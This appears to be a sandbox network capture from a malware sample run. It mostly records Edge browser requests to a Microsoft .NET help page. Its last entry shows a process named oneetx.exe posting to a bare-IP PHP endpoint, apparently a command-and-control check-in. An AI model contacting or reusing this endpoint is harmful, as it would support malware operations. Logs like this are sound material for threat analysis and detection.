
https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 15427
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:40 GMT
etag: "0x8D8E3CB365AA10A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0MlZTZAAAAAAwEAB12lP/S4ByhCc8+Y3mQU1TMDRFREdFMTgxNAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=464
expires: Fri, 13 Oct 2023 04:27:24 GMT
date: Fri, 13 Oct 2023 04:19:40 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 13339
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:35 GMT
etag: "0x8D8E3CB33C8B874"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0pnCMZAAAAADdTbBS7UHnRZ6AZnqhm94IQlJVMzBFREdFMTEyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=464
expires: Fri, 13 Oct 2023 04:27:24 GMT
date: Fri, 13 Oct 2023 04:19:40 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 18367
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:36 GMT
etag: "0x8D8E3CB3429357A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0ClBaZAAAAABIOmtgHPgtSLwjGUqaEPMqTE9OMjEyMDUwNzE3MDIxADcxNjg5MjBlLTlmNWItNGE2Mi1iMTZlLWQ1YmU2M2NlNjFlNw==
cache-control: public, max-age=919
expires: Fri, 13 Oct 2023 04:34:59 GMT
date: Fri, 13 Oct 2023 04:19:40 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 874
content-type: application/json
content-encoding: gzip
last-modified: Fri, 04 Aug 2023 16:48:26 GMT
etag: "0x8DB950A9F96B229"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0GGTRZAAAAADnHxz+yJAGRZvE4cn0SLgVQU1TMDRFREdFMTgxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=155
expires: Fri, 13 Oct 2023 04:22:16 GMT
date: Fri, 13 Oct 2023 04:19:41 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/toc.json

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 6943
content-type: application/json
content-encoding: gzip
last-modified: Wed, 27 Sep 2023 23:31:55 GMT
etag: "0x8DBBFB1EFF5709E"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0ar4WZQAAAAAlJ4z8xhHwQqzM1ssQe8wqQlJVMzBFREdFMDcxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=369
expires: Fri, 13 Oct 2023 04:25:50 GMT
date: Fri, 13 Oct 2023 04:19:41 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 4814
content-type: application/json
content-encoding: gzip
last-modified: Wed, 27 Sep 2023 23:32:01 GMT
etag: "0x8DBBFB1F37EB5B9"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 06r0WZQAAAACBkVeWAo5GQJjdukDu+Me6QU1TMDRFREdFMTkyMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=81
expires: Fri, 13 Oct 2023 04:21:02 GMT
date: Fri, 13 Oct 2023 04:19:41 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 13842
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:26 GMT
etag: "0x8D8E3CB2E2E71C7"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0nrhhZAAAAAC/rPHwMgTHTbFwczlS6ZH2RlJBMzFFREdFMDMwMwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=463
expires: Fri, 13 Oct 2023 04:27:24 GMT
date: Fri, 13 Oct 2023 04:19:41 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

content-length: 0
location: /en-us/media/logos/logo_net.svg
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20231013T041930Z-gyb06u165t0wm2pkc4nbh41ex400000004tg00000000ep31
cache-control: no-cache, no-store
expires: Fri, 13 Oct 2023 04:19:41 GMT
date: Fri, 13 Oct 2023 04:19:41 GMT
akamai-cache-status: Redirect from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/banners/index.json

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/banners/index.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 1873
content-type: application/json
content-encoding: gzip
last-modified: Tue, 26 Sep 2023 21:03:05 GMT
etag: "0x8DBBED3FA6BCA1B"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0pUgTZQAAAADlWRCbzTjRToqGLX/qhMrMQlJVMzBFREdFMTAxMQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=220
expires: Fri, 13 Oct 2023 04:23:22 GMT
date: Fri, 13 Oct 2023 04:19:42 GMT
akamai-cache-status: RefreshHit from child, Hit from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
POST

https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

msedge.exe

Remote address:

104.85.2.139:443

Request

POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 153
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/svg+xml
last-modified: Mon, 01 May 2023 22:46:35 GMT
etag: "0x8DB4A95EAB97D55"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0x1lQZAAAAAAFJ1oXoR2OTI/DIjg4nFxbTE9OMjFFREdFMTgxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
content-encoding: gzip
content-length: 542
cache-control: public, max-age=701
expires: Fri, 13 Oct 2023 04:31:23 GMT
date: Fri, 13 Oct 2023 04:19:42 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2 HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/edf5538c.site-ltr.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 17956
content-type: font/woff2
last-modified: Mon, 09 Oct 2023 21:01:25 GMT
etag: "0x8DBC90AE6AC067F"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0VRAlZQAAAADjMj2EfUPIRqWVVf7OLJfkQlJVMzBFREdFMDcwOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=361846
expires: Tue, 17 Oct 2023 08:50:28 GMT
date: Fri, 13 Oct 2023 04:19:42 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: 3976ce0e0d0685e28203d8a775c09fbc
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0XsUoZQAAAACruPIDG3n3SIHOdVx2XiuiQlJVMzBFREdFMDQyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 870
cache-control: public, max-age=43195
expires: Fri, 13 Oct 2023 16:19:37 GMT
date: Fri, 13 Oct 2023 04:19:42 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/favicon.ico

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /favicon.ico HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 17174
content-type: image/x-icon
last-modified: Thu, 01 Jun 2023 01:34:23 GMT
etag: "0x8DB6240546D1FAB"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0HO18ZAAAAAD2V0kOsHHARaLs4TlNmskMQU1TMDRFREdFMTgxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=391303
expires: Tue, 17 Oct 2023 17:01:25 GMT
date: Fri, 13 Oct 2023 04:19:42 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
POST

https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

msedge.exe

Remote address:

104.85.2.139:443

Request

POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
host: learn.microsoft.com
content-length: 153
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-encoding: gzip
vary: Origin,Accept-Encoding
access-control-allow-origin: https://learn.microsoft.com
request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
x-ms-operation-id: df721ece02861bf6a8ed8378959d7c4a
x-content-type-options: nosniff
x-powered-by: ASP.NET
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0YMUoZQAAAACKUYtsdZRJQapkQFXJDImNQlJVMzBFREdFMTAyMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 869
cache-control: public, max-age=43200
expires: Fri, 13 Oct 2023 16:19:44 GMT
date: Fri, 13 Oct 2023 04:19:44 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/media/logos/logo_net.svg

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /media/logos/logo_net.svg HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

location: /en-us/media/logos/logo_net.svg
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0Y8UoZQAAAADIlfmUiYlLTrNSSnrAkMOHQlJVMzBFREdFMDcxOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Fri, 13 Oct 2023 04:19:47 GMT
date: Fri, 13 Oct 2023 04:19:47 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
DNS

59.82.57.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.82.57.23.in-addr.arpa

IN PTR

Response

59.82.57.23.in-addr.arpa

IN PTR

a23-57-82-59deploystaticakamaitechnologiescom
DNS

139.2.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.2.85.104.in-addr.arpa

IN PTR

Response

139.2.85.104.in-addr.arpa

IN PTR

a104-85-2-139deploystaticakamaitechnologiescom
POST

http://5.42.65.80/8bmeVwqx/index.php

oneetx.exe

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 89
Cache-Control: no-cache
